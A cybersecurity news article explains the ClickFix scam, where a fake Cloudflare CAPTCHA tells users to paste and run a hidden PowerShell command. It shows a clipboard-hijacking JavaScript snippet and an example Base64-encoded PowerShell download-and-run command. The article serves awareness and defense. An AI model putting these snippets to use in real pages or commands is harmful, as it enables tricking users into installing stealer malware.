Cyber News

ClickFix Scam Masquerades as Cloudflare Check to Slip Malware

A new social engineering scam, nicknamed ClickFix, is making waves in the cybersecurity world by exploiting user trust in routine security checks.

Disguised as a Cloudflare CAPTCHA known as the “Turnstile” interface the attack lures unsuspecting victims into executing malware on their own systems through a technical sleight of hand that is deceptively simple, yet alarmingly effective.

Fake Verification, Real Threat

Unlike classic phishing attacks, which rely on malicious downloads or phishing forms, ClickFix leverages clipboard hijacking and user-aided code execution. Here’s how the technical workflow unfolds:

The fake Cloudflare page shown at the start of the attack
  1. Imitation Game: The attacker hosts a page that is a near-perfect replica of Cloudflare’s Turnstile CAPTCHA. This includes legitimate-looking branding, dynamically generated “Ray ID” numbers, and the correct domain references to avoid suspicion.
  2. Social Engineering via Familiar Prompts: Once a user lands on this page either via a compromised website, a typo-squatted domain, or a malicious link they are greeted with a message like:”Checking if the site connection is secure Verify you are human.”After ticking the familiar “I’m not a robot” checkbox, a new set of instructions appears, guiding the user through “verification steps.” These usually say:
    • Press ⊞ Win+R (opening the Windows Run dialogue)
    • Press Ctrl+V (to paste clipboard contents)
    • Press Enter (to run the pasted command)
  3. Clipboard Manipulation: At this point, a hidden JavaScript function on the page silently copies an obfuscated, Base64-encoded PowerShell command into the user’s clipboard. This critical step is performed using the modern Clipboard API, such as:javascriptnavigator.clipboard.writeText('powershell -encodedcommand ...'); The copied command typically fetches and executes a second-stage malware payload from a remote server.
  4. Unwitting Execution: When the user follows the instructions, their own keystrokes paste and execute the malicious command via Windows’ built-in tools like PowerShell or MSHTA. Because the user initiates this process, browser security mechanisms and endpoint protections (which might block downloads or flag unknown executables) are sidestepped.

The Malicious HTML Page

The ClickFix pages are often distributed as self-contained HTML files with all styles, images, and scripts embedded. The phishing code is deeply obfuscated to evade analysis and detection. Here’s a simplified breakdown:

  • Domain Spoofing: The HTML template dynamically displays the targeted website’s domain and a unique “Ray ID” string for authenticity.
  • Obfuscated Payloads: The PowerShell command is hidden (often Base64-encoded) to avoid simple pattern detection.
  • Clipboard API Abuse: The script forcibly overwrites whatever is in the user’s clipboard as soon as they interact with the page:javascriptdocument.querySelector('#checkbox').addEventListener('click', function() { navigator.clipboard.writeText(atob('UABvAHcAZQByAFMAaABlAGwAbAAg...')); });
  • No External Resources: The page loads no third-party assets, making it easy for attackers to serve from compromised domains or typo-squatted lookalikes.
  • No Obvious Red Flags: There’s no file to download and no suspicious browser warnings, further lowering the guard of users.

Human Factors Meet Technical Subtlety

Despite its low-tech approach, ClickFix remains effective due to a blend of technical concealment and psychological manipulation:

  • Verification Fatigue: Modern users are conditioned to click through CAPTCHAs and security checks without skepticism, especially when presented with familiar branding.
  • Trust in Appearance: The replicas are pixel-perfect; users are unlikely to double-check the domain when faced with a recognizable interface and HTTPS padlock.
  • URL Deception: Attackers may use domains nearly identical to real services (e.g., notionbox.org vs. notion.com) or even inject the code into legitimate, compromised websites.
  • Invisible Execution: By using clipboard and built-in system utilities instead of suspicious EXE downloads, attackers bypass many layers of endpoint security.

Typical Payload Example

A common obfuscated PowerShell payload might look like:

powershellpowershell -encodedCommand "JAB3AGUAYgBjAGwAaQBlAG4AdAAgAD0AIgBoAHQAdABwADoALwAvAGUAdgBpAGwALgBlAHgAZQAiADsAIgBwAG8AdwBlAHIAcABvAHMAdABqAG8AagBvAG4AUgBlAG0AbwB0AGUALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUgBlAHIAbwBLAGkAZAAoACkAIg=="

Decoded, this command typically downloads and executes a malicious payload, such as Lumma Stealer, Stealc, or RATs like NetSupport Manager.

Priya

Recent Posts

Burp Suite Supercharges Its Scanning Capabilities With React2Shell Vulnerability Detection

PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…

4 months ago

Malicious MCP Servers Enable New Prompt Injection Attack To Drain Resources

Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…

4 months ago

Law Enforcement Detains Hackers Equipped With Specialized Flipper Hacking Tools

Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…

4 months ago

Google Unveils 10 New Gemini-Powered AI Features For Chrome

Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…

4 months ago

CISA Alerts On Actively Exploited Buffer Overflow Flaw In D-Link Routers

Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…

4 months ago

Over 500 Apache Tika Toolkit Instances Exposed To Critical XXE Vulnerability

Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…

4 months ago